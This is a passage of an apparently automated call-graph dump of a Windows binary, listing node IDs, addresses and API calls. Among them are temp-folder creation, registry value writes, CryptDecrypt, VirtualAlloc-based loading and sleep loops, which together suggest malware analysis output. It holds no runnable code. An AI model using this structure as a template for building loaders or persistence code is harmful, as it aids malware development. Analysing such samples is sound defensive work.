calls 41552->41556 41553 40656e 41557 402360 39 API calls 41553->41557 41555 406659 41560 402360 39 API calls 41555->41560 41561 406979 41556->41561 41562 406576 41557->41562 41563 4064c1 41558->41563 41559 4066de 41565 402360 39 API calls 41559->41565 41566 406661 41560->41566 41567 402360 39 API calls 41561->41567 42685 407800 53 API calls 2 library calls 41562->42685 41563->41404 42677 407580 53 API calls 2 library calls 41563->42677 41569 406767 41564->41569 41570 4066e6 41565->41570 42694 407bc0 53 API calls 2 library calls 41566->42694 41572 406984 41567->41572 41575 40676b 41569->41575 41576 4067be 41569->41576 42699 407d50 53 API calls 2 library calls 41570->42699 41579 402360 39 API calls 41572->41579 41573 40657b 41586 402430 43 API calls 41573->41586 42704 407ee0 53 API calls 2 library calls 41575->42704 42709 408060 53 API calls 2 library calls 41576->42709 41578 406666 41588 402430 43 API calls 41578->41588 41582 40698f 41579->41582 41581 4066eb 41591 402430 43 API calls 41581->41591 41585 402360 39 API calls 41582->41585 41584 406770 41596 402430 43 API calls 41584->41596 41589 40699a 41585->41589 41590 40658b 41586->41590 41587 4067c3 41595 402430 43 API calls 41587->41595 41592 406676 41588->41592 41593 402360 39 API calls 41589->41593 41600 402360 39 API calls 41590->41600 41597 4066fb 41591->41597 42695 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41592->42695 41594 4069a5 41593->41594 41599 402360 39 API calls 41594->41599 41601 4067d3 41595->41601 41602 406780 41596->41602 42700 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41597->42700 41605 4069b0 41599->41605 41606 40659f 41600->41606 41616 402360 39 API calls 41601->41616 42705 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41602->42705 41604 40667f 41609 402360 39 API calls 41604->41609 41610 402360 39 API calls 41605->41610 41611 4065a8 41606->41611 42686 407890 53 API calls 2 library calls 41606->42686 41608 406704 41613 402360 39 API calls 41608->41613 41609->41404 41653 4069bf 41610->41653 42687 407910 53 API calls 2 library calls 41611->42687 41612 406789 41618 402360 39 API calls 41612->41618 41614 40670c 41613->41614 42701 407dd0 53 API calls 2 library calls 41614->42701 41621 4067e7 41616->41621 41619 406791 41618->41619 42706 407f60 53 API calls 2 library calls 41619->42706 41621->41404 42710 4080e0 53 API calls 2 library calls 41621->42710 41622 4065b2 41628 402430 43 API calls 41622->41628 41624 406711 41629 402430 43 API calls 41624->41629 41625 406796 41631 402430 43 API calls 41625->41631 41627 4067f0 41636 402430 43 API calls 41627->41636 41630 4065c2 41628->41630 41632 406721 41629->41632 41637 402360 39 API calls 41630->41637 41634 4067a6 41631->41634 42702 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41632->42702 41633 406a1e Sleep 41633->41653 42707 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41634->42707 41640 406800 41636->41640 41641 4065d6 41637->41641 41639 40672a 41643 402360 39 API calls 41639->41643 42711 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41640->42711 41641->41404 42688 4079a0 53 API calls 2 library calls 41641->42688 41642 4067af 41647 402360 39 API calls 41642->41647 41643->41404 41644 402430 43 API calls 41644->41653 41646 406809 41648 402360 39 API calls 41646->41648 41650 4067b7 41647->41650 41651 406811 41648->41651 42708 407fe0 53 API calls 2 library calls 41650->42708 42712 408160 53 API calls 2 library calls 41651->42712 41653->41633 41653->41644 41654 406a27 41653->41654 41660 406a16 41653->41660 41657 402360 39 API calls 41654->41657 41656 406816 41664 402430 43 API calls 41656->41664 41658 406a2f 41657->41658 41661 408c40 43 API calls 41658->41661 41659 4067bc 41662 402430 43 API calls 41659->41662 41663 402360 39 API calls 41660->41663 41665 406a40 41661->41665 41662->41485 41663->41633 41666 406826 41664->41666 41667 408c40 43 API calls 41665->41667 42713 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41666->42713 41670 40682f 41672 402360 39 API calls 41670->41672 41675 406837 41672->41675 42714 4081e0 53 API calls 2 library calls 41675->42714 41729 40b530 CallUnexpected 41728->41729 41730 403d7b GetTempPathA 41729->41730 41731 403db7 41730->41731 41731->41731 41732 402730 43 API calls 41731->41732 41740 403dd3 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41732->41740 41735 4092d0 43 API calls 41735->41740 41736 403f02 CreateDirectoryA Sleep 41737 403f30 CallUnexpected 41736->41737 41736->41740 41742 409b4a 41 API calls 41737->41742 41738 404f20 41739 40cfaf 39 API calls 41738->41739 41741 404f43 41739->41741 41740->41735 41740->41736 41740->41738 43015 410681 41740->43015 43018 403c30 41740->43018 41743 4107e2 GetSystemTimeAsFileTime 41741->41743 41746 403f64 CallUnexpected 41742->41746 41744 404f9f 41743->41744 41745 4106a2 39 API calls 41744->41745 41747 404fa8 CallUnexpected 41745->41747 41750 40402b 41746->41750 43033 409c85 6 API calls 41746->43033 41751 409b4a 41 API calls 41747->41751 41749 403fe2 41749->41750 43034 409f97 42 API calls 41749->43034 41752 402730 43 API calls 41750->41752 41777 404ffc CallUnexpected std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41751->41777 41754 4040a2 41752->41754 41756 4092d0 43 API calls 41754->41756 41755 40401e 43035 409c3b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 41755->43035 41758 4040cd 41756->41758 41758->41738 41759 404147 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41758->41759 41764 404207 41759->41764 43036 409c85 6 API calls 41759->43036 41762 4041b1 41762->41764 43037 409f97 42 API calls 41762->43037 41767 402730 43 API calls 41764->41767 41765 402730 43 API calls 41765->41777 41771 404262 41767->41771 41768 4092d0 43 API calls 41768->41777 41769 4041fa 43038 409c3b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 41769->43038 41772 4092d0 43 API calls 41771->41772 41774 404281 41772->41774 41776 401e20 44 API calls 41774->41776 41775 401e20 44 API calls 41775->41777 41783 404312 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41776->41783 41777->41765 41777->41768 41777->41775 41778 4052d0 Sleep 41777->41778 41779 4058bd 41777->41779 41785 402470 43 API calls 41777->41785 41790 4052e0 CallUnexpected 41777->41790 43052 409c85 6 API calls 41777->43052 43053 409f97 42 API calls 41777->43053 43054 409c3b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 41777->43054 41778->41777 41781 40cfaf 39 API calls 41779->41781 41780 4043e7 CallUnexpected 41786 409b4a 41 API calls 41780->41786 41782 4058c2 RegCreateKeyExA RegOpenKeyExA RegSetValueExA RegCloseKey 41781->41782 41787 405964 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41782->41787 41783->41780 43024 4021f0 41783->43024 41785->41777 41794 40441b CallUnexpected 41786->41794 41789 405a22 41787->41789 41791 405a0a std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41787->41791 41793 40cfaf 39 API calls 41789->41793 41798 409b4a 41 API calls 41790->41798 41792 4099d7 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 41791->41792 41795 405a1e 41792->41795 41796 405a27 41793->41796 41802 4044fc 41794->41802 43039 409c85 6 API calls 41794->43039 41795->41092 41800 4107e2 GetSystemTimeAsFileTime 41796->41800 41861 405315 __InternalCxxFrameHandler CallUnexpected std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41798->41861 41799 4044a6 41799->41802 43040 409f97 42 API calls 41799->43040 41801 405a7f 41800->41801 41804 4106a2 39 API calls 41801->41804 41805 402730 43 API calls 41802->41805 41807 405a88 Sleep 41804->41807 41808 40455d 41805->41808 41806 4044ef 43041 409c3b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 41806->43041 41811 402730 43 API calls 41807->41811 41809 4092d0 43 API calls 41808->41809 41814 404588 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41809->41814 41833 405aba 41811->41833 41813 402730 43 API calls 41813->41861 41821 4046c2 41814->41821 43042 409c85 6 API calls 41814->43042 41815 402730 43 API calls 41888 405c80 __InternalCxxFrameHandler CallUnexpected std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41815->41888 41818 405bc6 __InternalCxxFrameHandler std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41818->41815 41818->41888 41819 40466c 41819->41821 43043 409f97 42 API calls 41819->43043 41820 4092d0 43 API calls 41820->41861 41825 402730 43 API calls 41821->41825 41822 40cfaf 39 API calls 41822->41888 41827 40471d 41825->41827 41829 4092d0 43 API calls 41827->41829 41828 4046b5 43044 409c3b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 41828->43044 41832 40473c 41829->41832 41830 401e20 44 API calls 41830->41861 41836 401e20 44 API calls 41832->41836 41833->41818 43058 4025a0 41 API calls 41833->43058 41835 403a90 43 API calls 41835->41888 41839 4047cd std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41836->41839 41837 4107b2 43 API calls 41837->41888 41838 409b4a 41 API calls 41838->41888 41840 4021f0 8 API calls 41839->41840 41842 404d05 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41839->41842 41844 4048b8 SHGetFolderPathA 41840->41844 41841 4061c5 41848 406c20 53 API calls 41841->41848 41852 404dc1 CoUninitialize 41842->41852 41843 405682 41846 40577c CoUninitialize 41843->41846 41844->41842 41847 4048d5 41844->41847 41845 40fb0d 15 API calls ___std_exception_copy 41845->41861 41854 405792 41846->41854 41859 40495a 41847->41859 43045 409c85 6 API calls 41847->43045 41849 4061ec 41848->41849 41857 402430 43 API calls 41849->41857 41851 408c40 43 API calls 41851->41861 41867 404dd1 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41852->41867 41862 4057ae CoUninitialize 41854->41862 41855 404911 41855->41859 43046 409f97 42 API calls 41855->43046 41856 4035b0 52 API calls 41856->41861 41864 4061fc 41857->41864 41865 402730 43 API calls 41859->41865 41860 402730 43 API calls 41860->41888 41861->41779 41861->41813 41861->41820 41861->41830 41861->41843 41861->41845 41861->41851 41861->41856 41866 402ec0 93 API calls 41861->41866 41894 403410 41 API calls 41861->41894 41910 405687 41861->41910 43055 409c85 6 API calls 41861->43055 43056 409f97 42 API calls 41861->43056 43057 409c3b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 41861->43057 41880 4057bb std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41862->41880 41873 402360 39 API calls 41864->41873 41875 4049bd 41865->41875 41866->41861 41872 404e42 CoUninitialize 41867->41872 41868 40494d 43047 409c3b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 41868->43047 41870 4092d0 43 API calls 41870->41888 41892 404e52 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41872->41892 41874 406210 41873->41874 41878 4062e5 41874->41878 41879 406218 41874->41879 41895 4049f1 __InternalCxxFrameHandler std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41875->41895 43048 409590 43 API calls 4 library calls 41875->43048 41876 405895 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41881 4099d7 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 41876->41881 43075 406ec0 53 API calls 2 library calls 41878->43075 41890 406288 41879->41890 41891 40622b 41879->41891 41880->41779 41880->41876 41884 4058b6 41881->41884 41882 401e20 44 API calls 41882->41888 41884->41092 41885 4062ea 41904 402430 43 API calls 41885->41904 41886 4099d7 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 41893 404f19 41886->41893 41887 406192 Sleep 41887->41888 41888->41822 41888->41835 41888->41837 41888->41838 41888->41841 41888->41860 41888->41870 41888->41882 41888->41887 41911 40619e 41888->41911 41922 406c0b 41888->41922 41927 406188 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41888->41927 43059 4025a0 41 API calls 41888->43059 43060 409c85 6 API calls 41888->43060 43061 409f97 42 API calls 41888->43061 43062 409c3b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 41888->43062 41889 404bc3 CoInitialize CoCreateInstance 41889->41842 41903 404c68 41889->41903 43070 406db0 53 API calls 2 library calls 41890->43070 43065 406ca0 53 API calls 2 library calls 41891->43065 41892->41886 41893->41092 41894->41861 41895->41889 43049 409c85 6 API calls 41895->43049 41900 40628d 41907 402430 43 API calls 41900->41907 41901 404b87 41901->41889 43050 409f97 42 API calls 41901->43050 41902 406230 41909 402430 43 API calls 41902->41909 41940 404cb5 MultiByteToWideChar 41903->41940 41941 404ce3 CoUninitialize 41903->41941 41905 4062fa 41904->41905 41915 402360 39 API calls 41905->41915 41912 40629d 41907->41912 41908 404bb6 43051 409c3b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 41908->43051 41914 406240 41909->41914 41934 40571b Sleep 41910->41934 41945 40574a Sleep 41910->41945 42304 10001f20 75 API calls 41910->42304 42305 100010a3 CoUninitialize 41910->42305 43063 408c10 43 API calls 41911->43063 43071 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41912->43071 43066 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41914->43066 41919 40630e 41915->41919 41920 4063e4 41919->41920 41921 406316 41919->41921 43084 407260 53 API calls 2 library calls 41920->43084 43076 406f40 53 API calls 2 library calls 41921->43076 41932 403c20 21 API calls 41922->41932 41923 4062a6 41928 402360 39 API calls 41923->41928 41924 4061aa 41930 402360 39 API calls 41924->41930 41925 406249 41931 402360 39 API calls 41925->41931 41927->41887 41935 4062ae 41928->41935 41937 4061b2 41930->41937 41938 406251 41931->41938 41939 406c10 41932->41939 41933 40631b 41949 402430 43 API calls 41933->41949 41934->41843 41934->41910 43072 406e40 53 API calls 2 library calls 41935->43072 41936 4063e9 41951 402430 43 API calls 41936->41951 41943 402360 39 API calls 41937->41943 43067 406d30 53 API calls 2 library calls 41938->43067 41940->41941 41941->41842 41947 4061ba 41943->41947 41945->41843 41946 4062b3 41957 402430 43 API calls 41946->41957 43064 4017d0 CoUninitialize 41947->43064 41948 406256 41955 402430 43 API calls 41948->41955 41953 40632b 41949->41953 41954 4063f9 41951->41954 43077 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41953->43077 41964 402360 39 API calls 41954->41964 41958 406266 41955->41958 41960 4062c3 41957->41960 43068 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41958->43068 41959 406334 41962 402360 39 API calls 41959->41962 43073 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41960->43073 41966 40633c 41962->41966 41968 40640d 41964->41968 41965 40626f 41969 402360 39 API calls 41965->41969 43078 406fc0 53 API calls 2 library calls 41966->43078 41967 4062cc 41971 402360 39 API calls 41967->41971 41972 4064ce 41968->41972 43085 4072e0 53 API calls 2 library calls 41968->43085 41974 406277 41969->41974 41977 4062d4 41971->41977 43093 407600 53 API calls 2 library calls 41972->43093 43069 408c10 43 API calls 41974->43069 41975 406341 41983 402430 43 API calls 41975->41983 43074 408c10 43 API calls 41977->43074 41978 40641a 41985 402430 43 API calls 41978->41985 41980 4064d8 41987 402430 43 API calls 41980->41987 41982 406283 41984 40686e 41982->41984 43131 402330 43 API calls 41982->43131 41986 406351 41983->41986 41989 401770 41 API calls 41984->41989 41990 40642a 41985->41990 43079 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41986->43079 41992 4064e8 41987->41992 41993 406881 41989->41993 43086 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41990->43086 42002 402360 39 API calls 41992->42002 41996 408380 53 API calls 41993->41996 41995 40635a 41998 402360 39 API calls 41995->41998 41999 40688a 41996->41999 41997 406433 42000 402360 39 API calls 41997->42000 42001 406362 41998->42001 42009 402430 43 API calls 41999->42009 42003 40643b 42000->42003 43080 407040 53 API calls 2 library calls 42001->43080 42005 4064fc 42002->42005 43087 407360 53 API calls 2 library calls 42003->43087 42008 4065e3 42005->42008 43094 407680 53 API calls 2 library calls 42005->43094 42007 406367 42017 402430 43 API calls 42007->42017 43104 407a20 53 API calls 2 library calls 42008->43104 42013 40689d 42009->42013 42010 406440 42019 402430 43 API calls 42010->42019 42016 408300 53 API calls 42013->42016 42014 4065ed 42023 402430 43 API calls 42014->42023 42015 406509 42021 402430 43 API calls 42015->42021 42018 4068a8 42016->42018 42020 406377 42017->42020 42028 402430 43 API calls 42018->42028 42022 406450 42019->42022 42030 402360 39 API calls 42020->42030 42024 406519 42021->42024 43088 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 42022->43088 42026 4065fd 42023->42026 43095 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 42024->43095 42035 402360 39 API calls 42026->42035 42032 4068bb 42028->42032 42029 406459 42033 402360 39 API calls 42029->42033 42034 40638b 42030->42034 42031 406522 42036 402360 39 API calls 42031->42036 42037 408260 53 API calls 42032->42037 42038 406461 42033->42038 42039 4063ac 42034->42039 42040 40638f 42034->42040 42042 406611 42035->42042 42043 40652a 42036->42043 42045 4068c6 42037->42045 43089 4073e0 53 API calls 2 library calls 42038->43089 43082 407150 53 API calls 2 library calls 42039->43082 43081 4070d0 53 API calls 2 library calls 42040->43081 42048 406693 42042->42048 42049 406615 42042->42049 43096 407700 53 API calls 2 library calls 42043->43096 42058 402430 43 API calls 42045->42058 42047 406394 42059 402430 43 API calls 42047->42059 43111 407c40 53 API calls 2 library calls 42048->43111 43105 407ab0 53 API calls 2 library calls 42049->43105 42051 4063b1 42060 402430 43 API calls 42051->42060 42052 406466 42062 402430 43 API calls 42052->42062 42055 40652f 42064 402430 43 API calls 42055->42064 42056 406698 42068 402430 43 API calls 42056->42068 42057 40661a 42069 402430 43 API calls 42057->42069 42061 4068d9 42058->42061 42063 4063a4 42059->42063 42065 4063c1 42060->42065 42066 408d60 43 API calls 42061->42066 42067 406476 42062->42067 43130 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 42063->43130 42070 40653f 42064->42070 42079 402360 39 API calls 42065->42079 42071 4068ee 42066->42071 42082 402360 39 API calls 42067->42082 42072 4066a8 42068->42072 42073 40662a 42069->42073 43097 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 42070->43097 42076 408dc0 43 API calls 42071->42076 42089 402360 39 API calls 42072->42089 43106 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 42073->43106 42081 406906 42076->42081 42078 406548 42084 402360 39 API calls 42078->42084 42085 4063d5 42079->42085 42080 406855 42080->41982 42086 402360 39 API calls 42080->42086 42087 408e70 43 API calls 42081->42087 42088 40648a 42082->42088 42083 406633 42090 402360 39 API calls 42083->42090 42091 406550 42084->42091 42085->41982 43083 4071e0 53 API calls 2 library calls 42085->43083 42086->41982 42092 40691b 42087->42092 42093 406498 42088->42093 42094 40648e 42088->42094 42096 4066bc 42089->42096 42097 40663b 42090->42097 43098 407780 53 API calls 2 library calls 42091->43098 42100 408dc0 43 API calls 42092->42100 43091 4074f0 53 API calls 2 library calls 42093->43091 43090 407470 53 API calls 2 library calls 42094->43090 42104 4066c0 42096->42104 42105 40673e 42096->42105 43107 407b30 53 API calls 2 library calls 42097->43107 42102 406933 42100->42102 42108 408e70 43 API calls 42102->42108 42103 40649d 42116 402430 43 API calls 42103->42116 43112 407cd0 53 API calls 2 library calls 42104->43112 43118 407e50 53 API calls 2 library calls 42105->43118 42107 406555 42117 402430 43 API calls 42107->42117 42111 406640 42120 402430 43 API calls 42111->42120 42113 406743 42123 402430 43 API calls 42113->42123 42114 4066c5 42124 402430 43 API calls 42114->42124 42119 4064ad 42116->42119 42121 406565 42117->42121 42133 402360 39 API calls 42119->42133 42125 406650 42120->42125 43099 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 42121->43099 42128 406753 42123->42128 42129 4066d5 42124->42129 43108 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 42125->43108 42143 402360 39 API calls 42128->42143 43113 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 42129->43113 42131 40656e 42136 402360 39 API calls 42131->42136 42138 4064c1 42133->42138 42135 406659 42140 402360 39 API calls 42135->42140 42138->41982 43092 407580 53 API calls 2 library calls 42138->43092 42139 4066de 42144 402360 39 API calls 42139->42144 42149 406767 42143->42149 42150 4066e6 42144->42150 42154 40676b 42149->42154 42155 4067be 42149->42155 43119 407ee0 53 API calls 2 library calls 42154->43119 43124 408060 53 API calls 2 library calls 42155->43124 42304->41910 42305->41910 42308->40744 42309->40744 42310->40744 42312 409358 42311->42312 42315 4092ea __InternalCxxFrameHandler 42311->42315 43159 409590 43 API calls 4 library calls 42312->43159 42314 40936a 42314->40744 42315->40744 42317 401e70 42316->42317 42317->42317 42318 402730 43 API calls 42317->42318 42319 401e83 42318->42319 42320 402730 43 API calls 42319->42320 42321 401fc1 __InternalCxxFrameHandler 42320->42321 43160 40d0b0 42321->43160 42324 402169 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 42326 4099d7 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 42324->42326 42325 4020f9 42325->42324 42327 402198 42325->42327 42328 40218d 42326->42328 42329 40cfaf 39 API calls 42327->42329 42328->40744 42330 40219d 42329->42330 42331 401e20 43 API calls 42330->42331 42332->40765 42334->40747 42335->40766 42336->40785 42337->40801 42338->41021 42339->40749 42340->40764 42341->40783 42342->40803 42343->41021 42344->40740 42345->40774 42346->40795 42347->40811 42348->40827 42349->40840 42350->40880 42351->40885 42352->40880 42353->40776 42354->40813 42355->40832 42356->40844 42357->40861 42358->40883 42359->40880 42360->40936 42361->40990 42362->40814 42363->40848 42364->40866 42365->40888 42366->40913 42367->40935 42368->40963 42369->40983 42370->41023 42371->41034 42372->41064 42373->40846 42374->40890 42375->40917 42376->40943 42377->40965 42378->40988 42379->41015 42380->40889 42381->40945 42382->40969 42383->40992 42384->41019 42385->41036 42386->41051 42387->40952 42388->40995 42389->41024 42390->41037 42391->41054 42392->41072 42393->40998 42394->41039 42395->41058 42396->41069 42397->41084 42398->41072 42399->40909 42400->40819 42401->41096 42402->41108 42404->41106 42405->41117 42406->41131 42407->41135 42408->41139 42410 41066b 21 API calls 42409->42410 42411 403c27 42410->42411 42413 4128b8 42412->42413 42419 4128be 42412->42419 42441 413566 6 API calls _unexpected 42413->42441 42416 4128da 42417 4128e2 42416->42417 42418 4128c2 42416->42418 42443 413254 14 API calls 2 library calls 42417->42443 42420 412947 SetLastError 42418->42420 42419->42418 42442 4135a5 6 API calls _unexpected 42419->42442 42423 405a88 Sleep 42420->42423 42424 412957 42420->42424 42422 4128ef 42425 4128f7 42422->42425 42426 412908 42422->42426 42423->40714 42454 4110c9 39 API calls CallUnexpected 42424->42454 42444 4135a5 6 API calls _unexpected 42425->42444 42445 4135a5 6 API calls _unexpected 42426->42445 42431 412905 42447 4132b1 42431->42447 42432 412914 42433 412918 42432->42433 42434 41292f 42432->42434 42446 4135a5 6 API calls _unexpected 42433->42446 42453 4126d0 14 API calls _unexpected 42434->42453 42438 41292c 42438->42420 42439 41293a 42440 4132b1 ___free_lconv_mon 14 API calls 42439->42440 42440->42438 42441->42419 42442->42416 42443->42422 42444->42431 42445->42432 42446->42431 42448 4132e6 42447->42448 42449 4132bc RtlFreeHeap 42447->42449 42448->42438 42449->42448 42450 4132d1 GetLastError 42449->42450 42451 4132de __dosmaperr 42450->42451 42455 40d09d 14 API calls __dosmaperr 42451->42455 42453->42439 42455->42448 42456->41148 42457->41154 42458->41166 42459->41168 42460->41170 42461->41193 42462->41195 42463->41188 42464->41203 42465->41205 42466->41198 42467->41212 42468->41215 42469->41208 42470->41224 42472 409133 42471->42472 42473 4092bd 42472->42473 42474 4091fd 42472->42474 42482 409138 __InternalCxxFrameHandler 42472->42482 42490 4015d0 43 API calls 3 library calls 42473->42490 42478 409232 42474->42478 42479 409258 42474->42479 42476 4092c2 42491 401530 41 API calls 3 library calls 42476->42491 42478->42476 42480 40923d 42478->42480 42487 40924a __InternalCxxFrameHandler 42479->42487 42489 401530 41 API calls 4 library calls 42479->42489 42488 401530 41 API calls 4 library calls 42480->42488 42481 409243 42485 40cfaf 39 API calls 42481->42485 42481->42487 42482->41227 42486 4092cc 42485->42486 42487->41227 42488->42481 42489->42487 42490->42476 42491->42481 42492->41238 42493->41244 42494->41233 42495->41238 42500 40248e __InternalCxxFrameHandler 42496->42500 42501 4024b4 42496->42501 42497 402594 42727 4015d0 43 API calls 3 library calls 42497->42727 42499 402599 42728 401530 41 API calls 3 library calls 42499->42728 42500->41257 42501->42497 42504 4024ef 42501->42504 42505 402523 42501->42505 42504->42499 42725 401530 41 API calls 4 library calls 42504->42725 42509 40250f __InternalCxxFrameHandler 42505->42509 42726 401530 41 API calls 4 library calls 42505->42726 42506 40259e 42508 40cfaf 39 API calls 42508->42497 42509->42508 42510 402576 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 42509->42510 42510->41257 42512 4036fa GetLastError CryptReleaseContext 42511->42512 42513 40363e CryptCreateHash 42511->42513 42514 403844 42512->42514 42513->42512 42515 403662 42513->42515 42516 40386a std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 42514->42516 42518 403892 42514->42518 42519 409b4a 41 API calls 42515->42519 42517 4099d7 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 42516->42517 42520 40388e 42517->42520 42522 40cfaf 39 API calls 42518->42522 42521 40369a 42519->42521 42520->41303 42729 40fcdf 42521->42729 42524 403897 42522->42524 42524->41303 42526 4036d6 CryptDeriveKey 42526->42512 42528 403715 42526->42528 42527 4036c8 GetLastError 42527->42514 42529 40fb0d ___std_exception_copy 15 API calls 42528->42529 42530 40371b __InternalCxxFrameHandler 42529->42530 42531 409b4a 41 API calls 42530->42531 42532 40373a __InternalCxxFrameHandler 42531->42532 42533 403838 CryptDestroyKey 42532->42533 42534 4037ac CryptDecrypt 42532->42534 42533->42514 42534->42532 42534->42533 42536 402ee0 SetLastError 42535->42536 42537 402f08 42535->42537 42784 4029f0 70 API calls 42536->42784 42539 402f12 42537->42539 42540 402f49 SetLastError 42537->42540 42554 402f71 42537->42554 42785 4029f0 70 API calls 42539->42785 42786 4029f0 70 API calls 42540->42786 42541 402ef2 42543 4099d7 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 42541->42543 42546 402f04 42543->42546 42545 402f5b 42549 4099d7 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 42545->42549 42546->41303 42547 402f1c SetLastError 42548 4099d7 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 42547->42548 42550 402f39 42548->42550 42551 402f6d 42549->42551 42550->41303 42551->41303 42552 402fe7 GetNativeSystemInfo 42552->42539 42553 403016 VirtualAlloc 42552->42553 42555 403030 VirtualAlloc 42553->42555 42556 403056 HeapAlloc 42553->42556 42554->42539 42554->42552 42555->42556 42557 403042 42555->42557 42560 403077 VirtualFree 42556->42560 42561 40308b 42556->42561 42787 4029f0 70 API calls 42557->42787 42560->42561 42563 4030d7 SetLastError 42561->42563 42564 40316f VirtualAlloc 42561->42564 42562 40304c 42562->42556 42565 4030df 42563->42565 42576 40318a __InternalCxxFrameHandler CallUnexpected 42564->42576 42788 40fab8 42565->42788 42567 403132 HeapFree 42575 4099d7 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 42567->42575 42569 40330c 42569->42565 42777 402b50 42569->42777 42570 40fab8 ___std_exception_copy 14 API calls 42570->42567 42574 40326a 42769 402cd0 42574->42769 42578 40316b 42575->42578 42576->42563 42576->42565 42576->42574 42768 402e30 VirtualAlloc 42576->42768 42577 40331b 42577->42565 42581 403323 42577->42581 42578->41303 42579 4033aa 42582 4099d7 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 42579->42582 42580 40335a 42583 403394 42580->42583 42587 403365 42580->42587 42581->42579 42581->42580 42585 4033c0 42582->42585 42584 4099d7 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 42583->42584 42586 4033a6 42584->42586 42585->41303 42586->41303 42588 4099d7 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 42587->42588 42589 403390 42588->42589 42589->41303 42808 10005956 GetSystemTimeAsFileTime 42591->42808 42593 10001f48 42810 100059d5 42593->42810 42596 10001f4f __FrameHandler3::FrameUnwindToState 42813 10001523 42596->42813 42597 10002174 42599 100010a3 CoUninitialize 42597->42599 42600 10002188 42599->42600 42855 100026ff 42600->42855 42601 10002025 42843 10001cdd 49 API calls __EH_prolog3_GS 42601->42843 42603 1000219b 42603->41357 42605 1000202e 42606 10002164 42605->42606 42844 100059b4 37 API calls _unexpected 42605->42844 42608 10001bb9 25 API calls 42606->42608 42610 10002172 42608->42610 42609 10002040 42845 10001c33 39 API calls 42609->42845 42610->42597 42612 10002052 42846 10002493 27 API calls __InternalCxxFrameHandler 42612->42846 42614 1000205f 42847 10002230 27 API calls __InternalCxxFrameHandler 42614->42847 42616 10002079 42848 10002230 27 API calls __InternalCxxFrameHandler 42616->42848 42618 1000209f 42849 1000219f 27 API calls __InternalCxxFrameHandler 42618->42849 